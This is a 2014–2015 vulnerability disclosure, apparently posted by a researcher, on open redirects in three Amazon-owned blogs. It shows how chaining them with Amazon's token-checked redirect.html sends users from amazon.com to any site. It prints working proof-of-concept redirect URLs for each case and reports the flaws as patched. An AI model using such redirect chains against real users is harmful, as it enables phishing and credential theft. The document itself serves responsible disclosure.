Amazon Covert Redirect Bug Based on Kindle Daily Post, Omnivoracious, Car Lust

Amazon Covert Redirect Bug Based on Kindle Daily Post, Omnivoracious, Car Lust

-- Amazon Covert Redirect Based on Kindle Daily Post, Omnivoracious, Car Lust & kindlepost.com, omnivoracious.com, carlustblog.com Open Redirect Web Security Vulnerabilities

Domains:

http://www.amazon.com

"Amazon.com, Inc. (/ˈæməzɒn/ or /ˈæməzən/) is an American electronic commerce company with headquarters in Seattle, Washington. It is the largest Internet-based retailer in the United States. Amazon.com started as an online bookstore, but soon diversified, selling DVDs, Blu-rays, CDs, video downloads/streaming, MP3 downloads/streaming, software, video games, electronics, apparel, furniture, food, toys and jewelry. The company also produces consumer electronics—notably, Amazon Kindle e-book readers, Fire tablets, Fire TV and Fire Phone — and is a major provider of cloud computing services. Amazon also sells certain low-end products like USB cables under its inhouse brand AmazonBasics. Amazon has separate retail websites for United States, United Kingdom & Ireland, France, Canada, Germany, The Netherlands, Italy, Spain, Australia, Brazil, Japan, China, India and Mexico. Amazon also offers international shipping to certain other countries for some of its products. In 2011, it had professed an intention to launch its websites in Poland and Sweden." (Wikipedia)

All kindlepost.com, omnivoracious.com, carlustblog.com are websites belonging to Amazon.

(a) http://www.kindlepost.com

"The Kindle Post keeps Kindle customers up-to-date on the latest Kindle news and information and passes along fun reading recommendations, author interviews, and more."

(b) http://www.omnivoracious.com

"Omnivoracious is a blog run by the books editors at Amazon.com. We aim to share our passion for the written word through news, reviews, interviews, and more. This is our space to talk books and publishing frankly and we welcome participation through comments. Please visit often or add us to your favorite RSS reader to keep up on the latest information."

(c) http://www.carlustblog.com

"Car Lust is, very simply, where interesting cars meet irrational emotion. It's a deeply personal exploration of the hidden gems of the automotive world; a twisted look into a car nut's mind; and a quirky look at the broader automotive universe - a broader universe that lies beneath the new, the flashy, and the trendy represented in the car magazines."

Discover and Reporter:

Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (@justqdjing)

http://www.tetraph.com/wangjing/

Vulnerabilities Description:

Amazon has a computer bug security problem. Both Amazon itself and its websites are vulnerable to different kind of attacks. This allows hackers to do phishing attacks to Amazon users.

When a user is redirected from amazon to another site, amazon will check a variable named "token". Every redirected website will be given one token. This idea is OK. However, all URLs related to the redirected website use the same token. This means if the authenticated site itself has Open Redirect vulnerabilities. Then victims can be redirected to any site from Amazon.

The program code flaw can be attacked without user login. Tests were performed on Microsoft IE (9 9.0.8112.16421) of Windows 7, Mozilla Firefox (37.0.2) & Google Chromium 42.0.2311 (64-bit) of Ubuntu (14.04.2)，Apple Safari 6.1.6 of Mac OS X v10.9 Mavericks.

Use a website for the following tests. The website is "http://www.diebiyi.com/articles". Suppose this website is malicious, 

(1) Kindle Daily Post Open Redirect & Amazon Covert Redirect Based on kindlepost.com

(1.1) Kindle Daily Post Open Redirect Security Vulnerability

Vulnerable Links:

http://www.kindlepost.com/.services/sitelogout?to=https%3A%2F%2Fwww.typekey.com%2Ft%2Ftypekey%2F%3F__mode%3Dlogout%26_return%3Dhttp%253A%252F%252Fwww.kindlepost.com%252F2013%252F03%252Fqa-with-rainbow-rowell-author-of-eleanor-park.html

Poc:

http://www.kindlepost.com/.services/sitelogout?to=http%3A%2F%2Fwww.diebiyi.com%3F%26_return%3Dhttp%253A%252F%252Fwww.kindlepost.com

(1.2) Amazon Covert Redirect Based on kindlepost.com

Vulnerable URL of Amazon:

http://www.amazon.com/gp/redirect.html?location=http://www.kindlepost.com/2014/02/index.html&token=97EABBFF98EABCEDF090385394AD488FF77F2E0D

POC:

http://www.amazon.com/gp/redirect.html?location=http%3A%2F%2Fwww.kindlepost.com%2F.services%2Fsitelogout%3Fto%3Dhttp%253A%252F%252Fwww.diebiyi.com%253F%2526_return%253Dhttp%25253A%25252F%25252Fwww.kindlepost.com&token=97EABBFF98EABCEDF090385394AD488FF77F2E0D

(2) Omnivoracious Open Redirect & Amazon Covert Redirect Based on omnivoracious.com

(2.1) Omnivoracious Open Redirect Security Vulnerability

Vulnerable Links:

http://www.omnivoracious.com/.services/sitelogout?to=https%3A%2F%2Fwww.bing.com%2Ft%2Ftypekey%2F%3F__mode%3Dlogout%26_return%3Dhttp%253A%252F%252Fwww.omnivoracious.com%252F2008%252F05%252Flicensed-to-thr.html

POC:

http://www.omnivoracious.com/.services/sitelogout?to=http%3A%2F%2Fwww.tetraph.com%3F%26_return%3Dhttp%253A%252F%252Fwww.omnivoracious.com

(2.2)  Amazon Covert Redirect Based on omnivoracious.com

Vulnerable URL:

http://www.amazon.com/gp/redirect.html?location=http://www.omnivoracious.com/2014/01/women-in-wartime-four-new-historical-novels.html&token=7B08D69EFB23F01C31332A4EB1A38F4804AAB087

POC:

http://www.amazon.com/gp/redirect.html?location=http%3A%2F%2Fwww.omnivoracious.com%2F.services%2Fsitelogout%3Fto%3Dhttp%253A%252F%252Fwww.xinhuanet.com%253F%2526_return%253Dhttp%25253A%25252F%25252Fwww.omnivoracious.com&token=7B08D69EFB23F01C31332A4EB1A38F4804AAB087

(3) Car Lust Open Redirect & Amazon Covert Redirect Based on carlustblog.com

(3.1) Car Lust Open Redirect Security Vulnerability

Vulnerable Links:

http://www.carlustblog.com/.services/sitelogout?to=http%3A%2F%2Fwww.xvideos.com%3F%26_return%3Dhttp%253A%252F%252Fwww.carlustblog.com

POC:

http://www.carlustblog.com/.services/sitelogout?to=http%3A%2F%2Fwww.kickass.so%3F%26_return%3Dhttp%253A%252F%252Fwww.carlustblog.com

(3.2)  Amazon Covert Redirect Based on carlustblog.com

Vulnerable URL:

http://www.amazon.com/gp/redirect.html?location=http://www.carlustblog.com/2014/01/gmc-canyon-isuzu-i-series-and-chevrolet-colorado-gmt355-platform.html&token=E0915379AEBDF40D2C90D4882003C7011F43D80

POC:

http://www.amazon.com/gp/redirect.html?location=http%3A%2F%2Fwww.varlustblog.com%2F.services%2Fsitelogout%3Fto%3Dhttp%253A%252F%252Fwww.inzeed.com%253F%2526_return%253Dhttp%25253A%25252F%25252Fwww.omnivoracious.com&token=E0915379AEBDF40D2C90D4882003C7011F43D80

Vulnerabilities Disclosure:

The vulnerabilities were reported to Amazon in 2014. Amazon has patch the vulnerabilities.

POC Video:

https://www.youtube.com/watch?v=UE_-AdA-zpQ&feature=youtu.be

Related Articles:

http://seclists.org/fulldisclosure/2015/Jan/23

http://lists.openwall.net/full-disclosure/2015/01/12/2

http://www.tetraph.com/blog/computer-security/amazon-covert-redirect/

https://progressive-comp.com/?l=full-disclosure&m=142104346821481&w=1

http://computerobsess.blogspot.com/2015/06/amazon-covert-redirect_17.html

http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1429

http://tetraph.blog.163.com/blog/static/23460305120155176411897/
http://diebiyi.com/articles/security/amazon-covert-redirect/

https://itswift.wordpress.com/2015/01/17/amazon-covert-redirect/

http://marc.info/?l=full-disclosure&m=142104346821481&w=4

http://securityrelated.blogspot.com/2015/01/amazon-covert-redirec

http://www.inzeed.com/kaleidoscope/computer-web-security/amazon-covert-redirect/